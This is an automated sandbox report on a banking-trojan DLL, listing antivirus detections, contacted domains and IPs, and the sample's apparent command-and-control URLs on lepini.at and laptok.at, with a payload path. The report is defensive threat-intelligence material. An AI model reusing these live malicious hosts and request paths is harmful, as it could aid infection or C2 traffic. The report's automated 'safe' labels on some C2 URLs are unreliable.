C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sup11_dump.dll	46%	Virustotal		Browse
sup11_dump.dll	100%	Avira	TR/Crypt.ZPACK.Gen
sup11_dump.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.regsvr32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
c56.lepini.at	8%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yE	0%	Avira URL Cloud	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
http://constitution.org/usdeclar.txt	0%	Avira URL Cloud	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
http://api3.lepini.at/api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	92.122.253.103	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	92.122.253.103	true	false		high
c56.lepini.at	45.138.24.6	true	true	8%, Virustotal, Browse	unknown
lg3.media.net	92.122.253.103	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	45.138.24.6	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	45.138.24.6	true	false	11%, Virustotal, Browse	unknown
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true		unknown
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/favicon.ico	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.4.dr	false		high
https://www.remixd.com/privacy_policy.html	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
http://constitution.org/usdeclar.txtC:	regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.4.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.4.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001D.00000002.446586798.0000023380001000.00000004.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.3.dr	false		high
https://www.skype.com/	de-ch[1].htm.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.4.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.brightcom.com/privacy-policy/	iab2Data[1].json.4.dr	false		high
https://contoso.com/Icon	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.4.dr	false		high
https://bealion.com/politica-de-cookies	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yE	{1136F6F8-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.4.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.4.dr	false		high
https://www.gadsme.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	false		high
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.4.dr	false		high
http://constitution.org/usdeclar.txt	regsvr32.exe, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
http://www.youtube.com/	msapplication.xml7.3.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.4.dr	false		high
https://docs.prebid.org/privacy.html	iab2Data[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.4.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.4.dr	false		high
https://contoso.com/License	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
http://www.amazon.com/	msapplication.xml.3.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.twitter.com/	msapplication.xml5.3.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.admo.tv/en/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath	iab2Data[1].json.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
https://contoso.com/	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch&ued=https%	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.4.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false		high
http://www.nytimes.com/	msapplication.xml3.3.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.4.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://popup.taboola.com/german	auction[1].htm.4.dr	false		high
https://listonic.com/privacy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.4.dr	false		high
https://twitter.com/	de-ch[1].htm.4.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de	de-ch[1].htm.4.dr	false		high
https://quantyoo.de/datenschutz	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/#qt=mru	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap	auction[1].htm.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.138.24.6	unknown	Turkey		62068	SPECTRAIPSpectraIPBVNL	true
151.101.1.44	unknown	United States		54113	FASTLYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344607
Start date:	26.01.2021
Start time:	19:43:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	sup11_dump.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@31/158@17/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.6% (good quality ratio 5.3%) Quality average: 79% Quality standard deviation: 28%
HCA Information:	Successful, ratio: 99% Number of executed functions: 64 Number of non-executed functions: 209
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.108.39.131, 204.79.197.203, 204.79.197.200, 13.107.21.200, 95.101.22.61, 95.101.22.71, 65.55.44.109, 92.122.253.103, 131.253.33.203, 23.210.248.85, 51.11.168.160, 152.199.19.161, 95.101.22.224, 95.101.22.216, 205.185.216.10, 205.185.216.42, 72.247.178.83, 72.247.178.64, 72.247.178.59, 72.247.178.106, 72.247.178.98, 72.247.178.73, 72.247.178.51, 51.103.5.186, 52.155.217.156, 20.54.26.129, 51.104.139.180, 52.147.198.201 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, wns.notify.windows.com.akadns.net, e11290.dspg.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net, au.download.windowsupdate.com.edgesuite.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:45:32	API Interceptor	42x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.138.24.6	out.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	crypt_3300.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	xDKOaCQQTQ.dll	Get hash	malicious	Browse	2.18.68.31
	4bEUfowOcg.dll	Get hash	malicious	Browse	2.18.68.31
	crypt_l_32.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	92.122.253.103
hblg.media.net	xDKOaCQQTQ.dll	Get hash	malicious	Browse	2.18.68.31
	4bEUfowOcg.dll	Get hash	malicious	Browse	2.18.68.31
	crypt_l_32.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	92.122.253.103
tls13.taboola.map.fastly.net	xDKOaCQQTQ.dll	Get hash	malicious	Browse	151.101.1.44
	4bEUfowOcg.dll	Get hash	malicious	Browse	151.101.1.44
	crypt_l_32.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	151.101.1.44
